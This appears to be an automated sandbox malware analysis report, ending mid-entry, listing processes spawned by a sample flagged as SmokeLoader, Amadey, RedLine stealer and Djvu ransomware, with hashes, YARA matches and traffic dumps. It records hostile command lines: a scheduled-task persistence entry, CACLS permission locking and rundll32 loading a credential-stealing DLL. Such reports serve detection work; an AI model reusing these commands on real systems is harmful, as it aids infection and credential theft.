                                                                                                                                                                                    2023-01-05 07:57:04 UTC163OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:04 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:04 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: 3b2b597f-990d-4f31-960a-687ccc514cad
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PF026DECA3A V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:57:04 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 1962
                                                                                                                                                                                    2023-01-05 07:57:04 UTC169INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:08:56:58
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\Desktop\Ej3vSx3p8Y.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\Desktop\Ej3vSx3p8Y.exe
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:375296 bytes
                                                                                                                                                                                    MD5 hash:0FC582C0C4D53B3C6E5B23D3CCA924A2
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.447907484.0000000002EC2000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.448139316.0000000003041000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.447824560.0000000002EA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.447763126.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:08:57:40
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                    Imagebase:0x7ff618f60000
                                                                                                                                                                                    File size:3933184 bytes
                                                                                                                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000000.434102717.0000000004611000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                    Start time:08:58:20
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Roaming\fgifwju
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\fgifwju
                                                                                                                                                                                    Imagebase:0x7ff756d70000
                                                                                                                                                                                    File size:375296 bytes
                                                                                                                                                                                    MD5 hash:0FC582C0C4D53B3C6E5B23D3CCA924A2
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 69%, ReversingLabs
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                    Start time:08:58:21
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\6267.exe
                                                                                                                                                                                    Imagebase:0x1c0000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.474324647.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.474123082.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000002.484775584.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.474232440.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000D.00000000.473891939.00000000001C1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\6267.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 88%, ReversingLabs
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                    Start time:08:58:21
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\65C3.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\65C3.exe
                                                                                                                                                                                    Imagebase:0x1040000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.476139929.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.476296569.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.475679281.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000000.477078965.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\65C3.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 88%, ReversingLabs
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                    Start time:08:58:25
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe"
                                                                                                                                                                                    Imagebase:0x1170000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000003.499378760.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.837145100.00000000013C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000F.00000002.840197984.0000000001407000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.846222644.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000000.482993815.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.837539383.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 88%, ReversingLabs
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                    Start time:08:58:25
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\6D94.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\6D94.exe
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:854016 bytes
                                                                                                                                                                                    MD5 hash:FFD6FCCF4EBA94F39A66C3AB4E1DB54E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.820966008.00000000007B3000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000010.00000002.824473088.0000000002050000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 77%, ReversingLabs
                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                    Target ID:17
                                                                                                                                                                                    Start time:08:58:26
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe"
                                                                                                                                                                                    Imagebase:0x1170000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:868ACB586930934B250C949E4C3E180E
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000000.485779628.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000011.00000002.487641189.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                    Start time:08:58:26
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\user\AppData\Local\Temp\cb465ca805\nbveek.exe" /F
                                                                                                                                                                                    Imagebase:0xf30000
                                                                                                                                                                                    File size:185856 bytes
                                                                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                    Start time:08:58:27
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7c72c0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                    Start time:08:58:27
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\79AB.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\79AB.exe
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:215040 bytes
                                                                                                                                                                                    MD5 hash:25B78BEA81EFF1119CDD474FED74E295
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000014.00000002.531842055.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.528106149.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.530135332.00000000006B6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000014.00000002.531330257.0000000002080000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000014.00000003.505331035.0000000002080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 50%, ReversingLabs

                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                    Start time:08:58:27
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "user:N"&&CACLS "nbveek.exe" /P "user:R" /E&&echo Y|CACLS "..\cb465ca805" /P "user:N"&&CACLS "..\cb465ca805" /P "user:R" /E&&Exit
                                                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                    Start time:08:58:27
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7c72c0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                    Start time:08:58:27
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                                    Imagebase:0xd90000
                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                    Start time:08:58:27
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:CACLS "nbveek.exe" /P "user:N"
                                                                                                                                                                                    Imagebase:0x180000
                                                                                                                                                                                    File size:27648 bytes
                                                                                                                                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                    Start time:08:58:28
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\7E5F.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\7E5F.exe
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:327680 bytes
                                                                                                                                                                                    MD5 hash:3DC3A1679199E497DC2248616FF71002
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 77%, ReversingLabs

                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                    Start time:08:58:29
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:CACLS "nbveek.exe" /P "user:R" /E
                                                                                                                                                                                    Imagebase:0x180000
                                                                                                                                                                                    File size:27648 bytes
                                                                                                                                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                    Start time:08:58:29
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
                                                                                                                                                                                    Imagebase:0xf80000
                                                                                                                                                                                    File size:61952 bytes
                                                                                                                                                                                    MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:Borland Delphi

                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                    Start time:08:58:30
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe"
                                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                                    File size:240640 bytes
                                                                                                                                                                                    MD5 hash:BC45F9797F848DF442A883F994ADAD4A
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000000.494507476.0000000000FB1000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.530647017.0000000000FB1000.00000020.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\1000013001\Legno.exe, Author: Joe Security
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 69%, ReversingLabs

                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                    Start time:08:58:31
                                                                                                                                                                                    Start date:05/01/2023
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1000014001\anon.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1000014001\anon.exe"
                                                                                                                                                                                    Imagebase:0x7d0000
                                                                                                                                                                                    File size:179200 bytes
                                                                                                                                                                                    MD5 hash:E2D0B894694E83BF28B18A634504F131
                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000000.496552203.00000000007D2000.00000002.00000001.01000000.00000010.sdmp, Author: Joe Security
                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, Author: Joe Security
                                                                                                                                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\1000014001\anon.exe, Author: ditekSHen
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                    • Detection: 77%, ReversingLabs

                                                                                                                                                                                    Target ID:30
